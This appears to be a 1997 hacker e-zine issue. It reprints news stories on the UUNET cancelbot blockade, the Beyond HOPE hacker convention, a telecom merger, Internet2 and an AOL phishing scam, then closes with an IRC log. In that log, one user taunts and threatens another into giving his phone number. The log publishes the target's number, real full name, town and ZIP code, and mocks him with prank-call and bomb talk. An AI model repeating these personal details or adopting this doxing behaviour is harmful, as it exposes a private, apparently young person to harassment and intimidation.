blockade, was posted on Usenet. It says several people are involved in the action against UUNET, and that the action was taken because in recent weeks one-third to one-half of Usenet spam has originated with UUNET. The communique says the huge volume of spam threatens to destroy the network, and that the action was taken only because the company has ignored repeated requests from administrators around the world to do something about the spam problem. System administrators are persons who oversee computers that route messages on the Usenet system. Officials with UUNET, based in Fairfax, Va., said they would not comment until today, however the company's chief executive, John Sidgemore, told the Washington Post, "These people are not government agents or the police. They have absolutely no right to cancel service on someone else's infrastructure." An employee of the company who agreed to comment on condition of anonymity, said, "I can assure you that this company will use every legal means at its disposal to deal with it." UUNET provides Internet access to about 50,000 subscribers, but not individual users, only other Internet service providers. The number of people dependent upon UUNET is unknown but could be in the millions. Individual users would bump into the blockade if their local Internet service provider purchases Usenet access through UUNET. Users may not even know that their postings are being blocked. Vowing to continue The individuals who helped develop the blockade say they had no choice. "We are convinced this action was necessary to save the Net," said Dennis McClain-Furmanski, a student at Radford University in Radford, Va., who is acting as a spokesman for the group, which numbers about 20. The group has vowed to continue the action until UUNET takes some kind of action to minimize the spam it sends out into Usenet. While spams have existed almost as long as Usenet, their numbers have increased vastly in the last year. And spammers have become sneakier, forging fake return addresses, and even forging permission to appear in a "moderated" news group, where theoretically only messages approved by a human moderator appear. The vigilantes who are deleting the Usenet contributions are using -- or misusing -- a "cancel" feature built into the underlying software on which Usenet is based. Theoretically, only the person who posted an article on Usenet can issue a cancel command for it. Once issued, a cancel message races through the computers connected to the system around the world, erasing the article. Cancel messages are legitimately used by authors who have made a mistake or wish to withdraw an article for some other reason. Because there are no widespread authentication schemes in use on the Internet, it is fairly easy to forge a sender's address, however. And there are computer programs known as "cancelbots" that can be ordered to forge cancel messages against a spam and erase it throughout Usenet. The vigilantes use such cancelbots to eliminate spam whenever they spot it. Local system administrators can thwart such tactics by disabling the cancel feature on their systems. Therefore, the vigilantes argue, their cancel messages are mere "advisories." There have long been people who forge cancel messages, and even some legendary ``cancel wars'' between people who have attempted to shut each other up. But never before have so many users been cut off. "In military terms, this is acceptable collateral damage," said McClain-Furmanski. The amount of Usenet spam coming out of UUNET connections was so vast that it could no longer be dealt with by programming the cancelbots to eliminate individual messages, he said, so they were programmed to eliminate anything that came out of UUNET. Sean Eric Fagan of San Jose has owned a Usenet site for more than eight years. He is not directly participating in the blockade, but is supporting the participants. "I moderate the newsgroup comp.std.unix, which gets almost nothing but spam these days," he said. Fagan says everyone involved in the situation understands the danger that the power being wielded could be misused. "There's a hazard any time you've got somebody trying to enforce standards," he said, "but these people are not vigilantes." Others disagree, however. Godwin said, "Unless they've been deputized, then this is vigilante action." ©1997 San Jose Mercury News ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Netly News - HOPE On A Rope Nothing makes hackers happier than breaking into a computer that another hacker set up, especially when an appreciative audience is watching. Small surprise, then, that there were plenty of grins at last weekend's Beyond HOPE hacker convention in New York City. The first break-in attempt came at about 4 a.m. on Friday when a huge, tattoo-encrusted Englishman named Cyberjunkie ran a utility that probed the network of HOPE's Dutch sister conference, Hacking In Progress. The plan: to expose any weaknesses, then peel away the security measures of the target computer like the layers of an onion. The program quickly found several obvious security holes. "So I had to do something," Cyberjunkie says. "It's a bit like waving a red flag at a bull, isn't it?" Like the encierro at Pamplona, Cyberjunkie sent a stampede of null information into one of the server's memory buffers until it choked and overloaded. Quietly attached at the end was a simple script that granted him the access he wanted. (In hacker argot, this is known as an IMAP exploit.) Because hacking is not only encouraged but rewarded at HOPE -- which conference organizer Emmannuel Goldstein revived this summer after a three-year hiatus -- each of the thousands of participants received an IP address with which they could glom onto the Puck Building's 10-megabit network and connect to the rest of the world. The Pittsburgh-based DataHaven Project provided 15 public terminals, but Ethernet hub plugins were plentiful. Confused? No problem. The 13-year-old with braces in the next chair was glad to help out. After all, he'd already hooked his ancient DEC, Hewlett-Packard or portable IBM onto the Net and was busily trying to gain root access. When you'd tired of chatting on IRC #hope (topic at 4:11 p.m. on Saturday: "HOPE is a commercial enterprise full of bull"), you could browse through the various kinds of phone equipment, T-shirts or software that were on sale. Ether Bunny sold $250 worth of lineman's equipment (including several Southwestern Bell hard hats) in just over an hour. There was, of course, a constant stream of panels to attend: Tiger Teaming (better known as security consulting); cryptography; how to hack Windows NT; Metrocard hacking; a prisoner panel that included Bernie S. and Phiber Optik; and an amazing talk on privacy given by investigator Steve Rambam. Best known for tracking down 161 Nazi war criminals hiding in Canada, Rambam is a consummate connoisseur of databases. "It is true that I can go online and reliably determine if you are a homosexual or a lesbian. It is true that I can go online and determine your religion. I can go online and, without breaking a sweat or getting carpal tunnel syndrome, find what movies you rent at Blockbuster," he said. Yet Rambam takes an unlikely stance on the privacy issue, especially in a room full of paranoids. Closing off databases, he says, will not adversely affect his work -- since he'll always be able to buy the information from someplace. "It will harm the ability of the average person to control their lives; to check up on government to see if they are lying to him, to check up on big business to see if they are lying to him, to check up on the guy next door and see if he is an ax murderer," he said. Now Rambam may be biased, for he operates a billion-record database that is accessible online to subscribers (he refused to give the URL for fear of hacking attacks). Nevertheless, it was rare to see so many teenagers taking copious notes, noted fellow attendee Shabbir Safdar. The audience couldn't get enough of Rambam, who looked more like a fed than a hacker in his custom-made Hong Kong suit. (A big hit was when he detailed how to turn a dead man's identity into your own.) But ultimately, Rambam questioned why anyone would want to: "The fact of the matter is that there is no real reason to hide most of who you are and what you do." It's an unfortunate but true statement about the state of hacking today. Where have all the good hacks gone? Three years later and the flimsy Metrocard is still impenetrable. A panel of hackers turned security consultants showed that one of the biggest challenges for today's data cowboys was changing the preconceived notions of hackers held by the corporations they work for. Keynote speaker Brock Meeks, went so far as to admonish the crowd for their low hacker batting average (only 20 percent of all government computer systems have been hacked). His address was putatively a history of hacking in America, but it sounded more like a call to arms for the audience. "You're going to have to learn how to hack the media, because you haven't been doing a good job of it," Meeks said. Indeed, hackers get their share of bad press, and they gripe about it to no end. And HOPE highlighted the split personality hackers bring to their relationship with the media. Like most groups, they lambaste journalists. Yet their keynote speaker wasn't an agent provocateur, but a member of the press (albeit an esteemed one who champions the hacker cause). There was a panel discussion (which I participated in) where hackers could finally turn the tables on the media in attendance. "No weapons allowed," said the schedule of events. Yet only one of the audience's questions criticized the press, specifically noting John Markoff and his book on Kevin Mitnick. There was even a "Media Portrayal of Hackers" survey being distributed by a University of Tennessee sociology student as part of his master's thesis. Perhaps it's useless to analyze hacker-vs.-media steretypes. After all, the hacker community has shown that it can successfully run its own magazines, pirate radio stations and web sites. If it's true that information technology is going to obliterate old media, the horsemen of the apocalypse are more likely riding from alt.2600 than from Wired. "The whole 2600 thing is a media hack," admitted Goldstein. And the success of this year's HOPE showed not only that Goldstein knows how to co-opt the media but that he might be a damn good entrepreneur as well. ©1997 CNN ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Bell Atlantic-Nynex Merger Gets Final OK (08/14/97) By Kora McNaughton, TechInvestor WASHINGTON -- The Federal Communications Commission Thursday approved the merger of Nynex and Bell Atlantic, creating the second-largest phone company in the United States. Although the FCC's blessing was not altogether unexpected, Wall Street welcomed the news, pushing both companies' stock up after the late afternoon announcement. Bell Atlantic [BEL] gained 1 1/4 to close at 75 15/16; Nynex [NYN] closed up 1 1/8 at 58 1/16. Last month, after the two companies proposed conditions designed to promote competition in their markets, the agency's chairman, Reed Hundt said he was ready to approve the deal. Hundt stumped for a new telecommunications law on Thursday. In a joint announcement, Nynex and Bell Atlantic said they are "pleased" that the agency unanimously agreed to the merger, which will close "as soon as possible." The $23 billion merger, first announced in April of 1996, will create a phone company with a presence in markets covering most of the Eastern seaboard, serving 40 million phone access lines and 5.5 million wireless customers. It will be headquartered in New York. Since the merger was announced, Bell Atlantic and Nynex have been dancing with regulators on both the Federal and local levels. Commissioner Rachelle B. Chong said in a statement Thursday the FCC approved the deal "only after a very careful analysis of the likely market effects of the merger, and the imposition of certain enforceable pro-competitive conditions to help ensure that the local network is opened -- and stays opened -- to new competitors." The conditions include providing detailed performance reports to competitors and regulators, offering interconnection, network element, transport, and termination at rates based on forward-looking economic costs, and offering shared transport priced by the minute and routed just as Bell Atlantic's own traffic, without access charges. Bell Atlantic and Nynex proposed the conditions July 19, one day after the Eighth U.S. Circuit Court in St. Louis ruled that the FCC had exceeded its authority by trying to set the prices new entrants will pay for access to local phone networks. The Baby Bells built the networks, but now must share them with competitors. Long-distance companies such as AT&T and MCI have accused the RBOCs of delaying required upgrades to the local networks to allow for competition; earlier this week, MCI complained Nynex was taking too long to process orders for MCI local service in New York, thereby slowing MCI's growth in that region. In a statement after the ruling Thursday, MCI Chief Policy Counsel Jonathan Sallet praised the FCC. "The conditions that have been announced today and that will be enforced by the FCC will help to alleviate the anticompetitive impact of the Bell Atlantic-Nynex merger," he said. ©CMP Media, 1996. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Getting Ready For Internet2 (08/18/97) By Larry Lange, Electronics Engineering Times ANN ARBOR, Mich. -- The effort to build Internet2--an academic and government research-only network separate from the increasingly commercialized Internet--is kicking into high gear following a series of technical meetings this summer. The effort is rapidly picking up participants from universities that want to log on to the proposed high-speed, multimedia-oriented network. And communications OEMs are eyeing Internet2 as an ideal test bed for their next-generation systems. Having completed a critical technical workshop here early this month and one in July in Denver, the Internet2 organization is pushing to meet its self-imposed deadlines for bringing its network live by year's end, with three university members to be connected as early as this month. The network promises benefits for commercial as well as academic Internet users. Obviously, offloading institutional traffic from the commercial Internet will speed transmissions for both Internet and Internet2 users. But the "I2" will also "speed the development of new network features and functionality," said Charles Lee, senior manager of Internet2 interests for MCI Communications Inc. Those features and functions "could then be incorporated into the commercial Internet," Lee said. The work is coming at a time when the underlying base technology of the Internet Protocol is being pulled in many directions. In this environment, communications OEMs are eager for a safe haven to test out future technologies. "Internet2 will provide a large-scale environment to try out new ideas and equipment running at speeds faster than any in operation with an intellectual community of users," said Stephen Wolff, director of business development for Cisco Systems Inc., a participant in the project. The Internet2 organization has grown from 34 members at its October inception to more than 100 research universities today. Notable government representatives hail from the U.S. Department of Energy and the National Science Foundation (NSF, Arlington, Va.). Several members are already engineering prototype network facilities, with the project's initial operations expected to begin by year's end. "We originally thought only 20 to 30 of the major research universities had such a high priority for continuing to build their network infrastructure that they would join the project," said Internet2 director Mike Roberts of Educom, a consortium of universities that promotes the use of information technology in education and research. "Obviously, we were wrong." So far, Internet2 university members have committed up to $50 million per year in new funding for the project, and the commercial sector--with project representation from such companies as Cisco, Lucent Technologies, Sun Microsystems, IBM, AT&T and Microsoft--has pledged more than $5 million. By contributing funding to university partners, the corporations can tap the project as a testbed for unproven Internet technologies--a task that's difficult to undertake on today's overcrowded Internet. Internet2 organizers are working with representatives from IBM, MCI, Cisco and other internetworking companies to discuss the needs of the system architects developing the advanced Internet2 nodes called Gigapops (points of presence)--the network aggregation points for the second-generation Internet wide-area network. Ted Hanss, director of applications development for the Internet2 project, told EE Times that such applications-enabling technologies as security, multicast and quality of service were among the important topics discussed at the summer meetings. The applications heading the list for I2 are collaborative environments, digital libraries, tele-immersion, tele-medicine and distance-independent instruction, Hanss said. Internet2 engineers have officially settled on an architecture of connectivity through Gigapops, which can swiftly connect the campuses, labs and, later, the urban-area and state/regional networks envisioned by the Clinton administration's Next-Generation Internet (NGI) initiative. Accordingly, Internet2 engineers look to deliver 622-Mbit/second transmissions to three supercomputer centers, running the Internet Protocol (IP) over an asynchronous-transfer-mode (ATM) network. And they want to boost bandwidth by nearly 14 percent for the University of Illinois National Center for Supercomputer Applications (NCSA), the San Diego Supercomputer Center and the Pittsburgh Supercomputer Center, with the promise of 20 more universities to be linked by this fall to Gigapops that will deliver data at speeds of at least 155 Mbits/s. (Current commercial transmission speeds top out at 45 Mbits/s.) Other Internet2 project members have laid the foundations for connectivity to the network based on its anticipated speeds. A group of universities in California recently announced the building of an Internet2 network that will be designed to connect campuses at speeds of over 600 Mbits/s. "The electronic highway is faced with rush-hour traffic most of the day. We need reliable service delivery," said M. Stuart Lynn, associate vice president at the University of California and the principal investigator for the project. The participating schools include seven campuses of the University of California, along with the California Institute of Technology, California State University, Stanford University and the University of Southern California. Notable goals for the project will be the formation of a virtual university in which students can view publications from distant libraries and take classes located at other campuses. Internet2 is systematically swallowing up the National Science Foundation's Very High-Performance Backbone Network Service (vBNS). More than 50 Internet2 institutions have received competitively awarded vBNS grants under the NSF's High Performance Connections program. In fact, vBNS could be considered the heart of Internet2, or at least its substantive launchpad. Begun in 1995, with an investment of $50 million under a five-year cooperative project with MCI, the service links six NSF supercomputer centers and was initially implemented to design and support "gigabit testbeds" for R&D of advanced networking technologies. The centers are located at the Cornell Theory Center, at NCSA and elsewhere. Those technologies included ATM/Sonet, the interfacing of ATM to the High Performance Parallel Interface and HiPPI switches, and all-optical networking. Each testbed addressed an application that required gigabit-speed networks. The trunk-line infrastructure for true broadband services to academia is being defined at a time when the core protocols for the Internet are being upgraded from the original transport and network protocols developed by the Advanced Research Projects Agency (now Darpa) in the 1980s. NSF program director Mark Luker said many of the problems restricting the commercialization of the original Internet "should be solved within the next few years using Internet2." Once traditional not-for-profit users move to the new network, Luker said, "it will be easier to implement pay schemes and give incentives to finance further Internet growth." Luker's comments underscore one of the motivations behind the administration's NGI initiative: relieving the current Internet's bandwidth bottlenecks. "This is an ongoing proposition. It won't stop with Internet2. I see an Internet3 and 4 in the near future," Luker said. By the end of 1998, Internet2 looks to have nearly all participating universities employing stable Internet2 connections. Projects under development with Internet2, Luker said, include digital multimedia libraries accessible in virtual reality, enhanced collaborative workplace communities with live digital video feeds, videoconferencing, collaborative computer-integrated manufacturing, weather forecasting and military-troop-movement monitoring. A briefing on Internet2 by the NASA Ames Research Center at Moffett Field (Mountain View, Calif.) drew more than 60 companies. "Although much of the research needed to make a new, superfast Internet is too risky and long-term for the private sector, our success will depend on partnerships with private industry and universities," Christine Falsetti, NGI project manager at Ames, said. NASA recently designated Ames the lead institution for the agency's $30 million portion of a three-year, $300 million federal project to develop the NGI. "We want a network for researchers that is fast from end to end. And we will work with private companies on routers, switchers and computer workstations that will send computer information much faster than today's machines can send it," Falsetti said. One NASA goal is to create "co-laboratories" by linking labs, computers, databases and scientists from around the world via I2. Ames is organizing a September workshop for companies interested in such emerging applications. The NGI initiative was unveiled in October with three basic goals: to connect universities and national labs with high-speed networks that would be 100 to 1,000 times faster than the commercial Internet; to promote experimentation with advanced multimedia technologies, such as real-time videoconferencing; and to demonstrate new applications that support scientific research, national security, distance education, environmental monitoring and health care. On the campaign trail, the Clinton administration promised $100 million in funding for its initiative. The funds are set for release in January. Internet2 spokesmen are quick to say that the network is not designed to replace the existing public Internet or to sidestep the NGI initiative. "The goals of Internet2 and of the NGI are entirely compatible and complementary," said Douglas Van Houweling, vice chairman of Internet2. "There is a compelling unanimity of purpose and direction." Yet Internet2 is not without its critics. There have been suggestions, for instance, that universities are leveraging the project to maintain a separate network presence. But Internet2 Steering Committee member Raman Khanna disputed that assertion. "At Stanford, where I work, only 15 percent of Internet traffic goes toward other universities," Khanna said. "The other 85 percent connects the school to the rest of the commercial network. Even if academia were to isolate its future, high-speed network system, it would speed up only 15 percent of its Internet traffic." Khanna also noted that the high-speed network is merely for the development of advanced applications and that any advances made will be available to all Internet users in three to five years. Another point of controversy is the government's role in funding specific university projects though Internet2. Several high-level lawmakers complained at recent Senate hearings that the NGI program favors urban areas and large universities. But Neal Lane, director of the National Science Foundation, said that Internet2 "is not an established infrastructure like a highway. It is a work in progress . . . and it is experimental. "That is the reason we need the nation's researchers to help us move forward." It remains to be seen whether the Internet2 body can pull off its monumental project and then seamlessly bring the network into line with the commercial Internet and provide bandwidth and multimedia solutions for the NGI, all by the slated deadline of 2000. If it can, the project will look to realize even more impressive goals. Internet2 plans to share discoveries with others in education worldwide. "This is the approach that characterized the first Internet," said NSF's Luker, "and it can work again with Internet2." ©CMP Media, 1996. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ AOL urges its members to protect themselves August 26, 1997 By Franklin Paul NEW YORK (Reuter) - America Online Inc.'s subscribers can do as much, if not more than the company can, to protect themselves from online theft and fraud, a company executive said Tuesday following a recent scam. The world's largest online service says smart members can do more to keep their personal information private than could any protective software program or lurking online police. "If you want to protect yourself, you need to protect your personal information," Tatiana Gau, AOL's vice president of integrity assurance, said in an interview. "We have a three-pronged approach; to educate, empower and enforce, where we put the tools in the hands of our members to allow them to protect themselves," against those who would take personal information to commit crimes like credit card fraud, she said. The approach includes frequently reminding the service's more than 8 million members that AOL staff members will never ask for password or billing information, and telling them where to go to report a scam in action. "People are beginning to realize that the same kind of scams that occur in real life do occur online," Gau said. "So in the same way in real life you would never dream of giving out your PIN number to your ATM card, you shoudn't be doing it online either." Earlier this month, a scam was perpetrated on AOL whereby members received electronic mail that invited them to jump to a Web page which contained text of a letter from AOL Chairman Steve Case. From there, another link asked members to enter billing information. Thinking they were providing data to AOL, they were really handing their vital information to thieves. While Gau would not say how many members were duped by the scam, or if the perpetrators were caught, she said it was other AOL members that fingered the crooks. "It was literally within a matter of hours of the mail being sent out that the e-mail was forwarded to us, which allowed us to very quickly get the site shut down," she said. "The billing scam ... is really testimony to the fact that our ... mechanisms are working," she said. She adds that the company's other security measures include adding alerts to the first screen that members see when they sign on and putting e-mail with safety tips in the mailboxes of new members. AOL also urges members not to download files from sources they are unfamiliar with and it makes available free anti-virus software. AOL's stock fell $1 to close at $66 on the New York Stock Exchange. ©Reuters Ltd. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Logs - Yaaay! It's IRC!!! ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ discore messing around with that always lame ZeR0-HeX: Session Start: Mon Aug 18 01:31:53 1997 [1:31] you're bullshitting [1:31] you don't know shit [1:32] if you really do know my phone number [1:32] tell it to me ok! Session Close: Mon Aug 18 01:33:16 1997 Session Start: Mon Aug 18 01:33:17 1997 [1:33] may i ask where you received this information from? my ereet hackmobile. [1:33] come on [1:33] i just wanna know sorry tootsies, no can do [1:33] turn ur away message off!!!!!!!11 hmmm, whats yer phone #, i dont feel like calling the operator [1:34] alright [1:34] well [1:34] i believe ya teehee elite! so [1:35] what do you intend to do with this information? i have done nothing wrong to you. so please don't do anything bad why did ya copy phrack? [1:35] oh thats not very nice you know [1:35] so this is what it's about [1:35] ok [1:35] i'll explain [1:35] but [1:35] you gotta promise not give my info out to anyone [1:35] ok? teehee over 14,000 ppl have it [1:36] who? woot tell me why i want to kn0w [1:36] wait [1:36] i'll tell you [1:36] but 1st [1:36] you gotta tell me where you got the info from [1:36] and you gotta tell me who the 14000 people are [1:36] and how theygot it hmm, i dont know all the names of the 14,000 ppl but i will check it! ill make ya a deal, ok? [1:37] how the hell did 14000 people get it? wanna deal? [1:37] sure oK! [1:37] * ZeR0-HeX listening [1:37] ??? tell me a real phone # of your house, and i will tell you what you want to know, if the phone # is fake-o then inphoz get posted on alt.sex.* [1:38] why do you want my phone number? [1:38] so you can give it to the 14,000 people [1:38] nice try cause im too lazy to call the operator [1:38] then you can bullshit me after no actually i keep files on ppl heh and like, i just want it for personall use i wont play with ya [1:38] who the fuck are you?? dont worry, i could still get it through other ways than you [1:38] why do you have my info??? im discore! [1:39] oh man.. thats what our deal is about buddy its a fair trade [1:39] jeez, you're something :-) [1:39] what info do i want1!! [1:39] the only thing i want [1:39] is to not let the 14,000 people know [1:39] listen [1:39] if you were really a hacker [1:40] you would have known my number well, you are right BUT im lazy and bored tonight so you are my project [1:41] ok [1:41] if i give you my phone number [1:41] what would i get back in return [1:41] ABSOLUTELY SHIT whatever you want out of me, sex or anything! [1:41] i still can't stop the 14000 people [1:41] lol [1:41] hehe so wanna do that? [1:42] ok [1:42] but wait [1:42] i'll giva ya my number K! [1:42] but [1:42] what are you gonna tell me? how the ppl got it, where they got it and why it was made public. [1:42] hmmm [1:42] ok [1:42] but [1:43] wait [1:43] after i give you the numer [1:43] number [1:43] you can't tell anyone it [1:43] ok? i know! [1:43] no [1:43] don't bullshit me why would i bullshit you? [1:43] this is serious shit im getting something. [1:43] ok [1:43] dont tell anyone [1:43] ok k.. [1:43] fine [1:43] you go 1st [1:43] with the info bahahaha [1:43] then i'll go nein, cause i have something that is more important to you. [1:44] obviously i'll tell you the number!! i dont want my address and name posted up everywhere in the internet [1:44] alright [1:44] alright [1:44] 860 [1:44] 875 [1:44] 2117 well teehee, i dont trust you, but you shouldnt trust me but im in control. [1:44] there [1:44] gimme a call tomorrow [1:44] :-) [1:44] ok lemme look for a sec to verify [1:44] now can i have the info please? [1:44] ok [1:44] wait [1:44] hey [1:44] go to www.yahoo.com [1:44] go to people search [1:45] type in mumtaz alam [1:45] ellington, ct 06029 [1:45] there, made it ez fer ya extremly i used yp.uswest.com but thats ok! now what you wanna know? [1:45] ok [1:45] the public crap? [1:46] how the 14000 people got it [1:46] etc. [1:46] how you got it [1:46] etc. well, there is a land called #phreak they owned you recently [1:46] grrrrrr [1:46] and.... well its not our fault you used your real name in email headers [1:46] what??? and ppl spread shit. [1:46] which one/? [1:46] not zer0-hex [1:46] what e-mail headers? teehee in your emails it has your real name aol does it by defult :) [1:47] i use zer0-hex@juno.com [1:47] how did they get faraz outta that [1:47] huh? well, heh, thats how we got it! [1:47] what has it? [1:47] where? [1:47] where???? settle young child of the force [1:48] well? [1:48] sometime today would be nice? [1:48] i'd like to get some sleep i dont understand the question. [1:48] what e-mail header? [1:48] what about aol? [1:48] i dont have aol well it seems you sent some mail from aol that contained your real name [1:48] huh? [1:48] where? and that went public cause no one was hapy with you for copying phrack [1:48] when? i dunno geeze im not god [1:49] i thought you had the answers [1:49] !!! [1:49] ok [1:49] now how did it get public? [1:49] and how did 14000 people get it? ppl spread inphoz fastly in the hightech society we live in well not 1400 not 14000 i exaggeratted [1:49] but why would 14000 people want it? for educational purposes [1:49] jeez [1:50] is uh [1:50] anyone gonna send me a bomb? [1:50] :-) [1:50] or gimme a 1000 prank calls i hope not for your sake. have you got anything yet? trust me, the ppl who got these infoz could easily get your phone #, i just did it first. teehee [1:51] what do you mean, have i got anything? have you got any prank calls or any bombs or anything fun? [1:51] no [1:51] not yet.. [1:51] :-) [1:51] hehe then